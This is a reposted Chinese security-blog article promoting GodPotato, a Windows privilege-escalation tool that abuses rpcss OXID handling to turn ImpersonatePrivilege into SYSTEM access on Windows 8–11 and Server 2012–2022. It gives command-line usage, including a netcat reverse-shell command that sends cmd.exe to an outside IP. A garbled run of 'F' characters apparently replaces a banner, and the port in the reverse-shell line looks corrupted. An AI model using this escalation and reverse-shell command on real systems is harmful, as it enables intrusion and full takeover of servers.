神兵利器丨GodPotato新版土豆提权
2023-4-23 09:49:57 Author: 黑白之道(查看原文) 阅读量:38 收藏

 基于Potato提权6年的历史,从RottenPotato开始到JuicyPotatoNG结束,我通过研究DCOM发现了一个新技术,可以在Windows 2012-Windows 2022中实现提权。

        rpcss在处理oxid时存在一些缺陷,rpcss是系统必须开启的服务,因此它几乎可以在任何 Windows 操作系统上运行,我将其命名为 GodPotato。

        现在只要你有” ImpersonatePrivilege”权限,那你就是“NT AUTHORITY\SYSTEM”,通常WEB服务和数据库服务都有“ImpersonatePrivilege”权限。

受影响版本:

Windows8 - Windows 11Windows Server 2012 - Windows Server 2022

FFFFF FFF FFFFFFF FFFFFFF FFF FFFFFFFF FFF FFFF FFF FFF FFF FFF FFF FFF FFF FFF FFF FFF FFF FFF FFF FFF FFF FFF FFF FFF FFF FFFF FFFFFFF FFFFFFFF FFF FFF FFFFFFF FFFFFFFFF FFFFFF FFFFFFFFF FFFFFF FFFF FFFF FFFF FFF FFFF FFF FFFF FFFF FFFF FFF FFF FFF FFF FFF FFFF FFFF FFFFF FFF FFF FFF FFF FFFFFFFF FFF FFF FFF F FFF FFF FFF FFF FFFF FFF FFF FFFFFFF FFF FFF FFFF FFF FFF FFFFF FFF FFF FFFF FFFF FFF FFF FFFFFFF FFF FFF FFFF FFF FFF FFFFFFFF FFF FFF FFFF FFF FFF FFF FFF FFF FFF FFF FFF FFF FFF FFFF FFF FFF FFF FFFF FFFF FFFF FFFF FFF FFFF FFF FFF FFF FFFF FFF FFFF FFF FFF FFFF FFF FFFFFFFF FFFFFFF FFFFFFFF FFF FFFFFFF FFFFFF FFFFFFFF FFFFFFF FFFFFFF FFFFFFF FFFFF FFFFFFF FFF FFFFF FFFFF FFFFFFFF FFFF FFFF

Arguments:
-cmd Required:True CommandLine (default cmd /c whoami)
Example:
GodPotato -cmd "cmd /c whoami"

使用程序内置的Clsid进行权限升级,执行一个简单的命令

GodPotato -cmd "cmd /c whoami"

定制Clsid和执行命令

GodPotato -cmd "cmd /c whoami"

执行反向的shell命令

GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2  2012"

文章来源: Khan安全攻防实验室 

黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!

如侵权请私聊我们删文

END

多一个点在看多一条小鱼干


文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650568463&idx=4&sn=e353cf37eb6020ffd40ab22de7d8be04&chksm=83bd12ebb4ca9bfdad751a46e6ffd47644eeec22f95097f00b509cef153ff493cbf1ca989f31#rd
如有侵权请联系:admin#unsafe.sh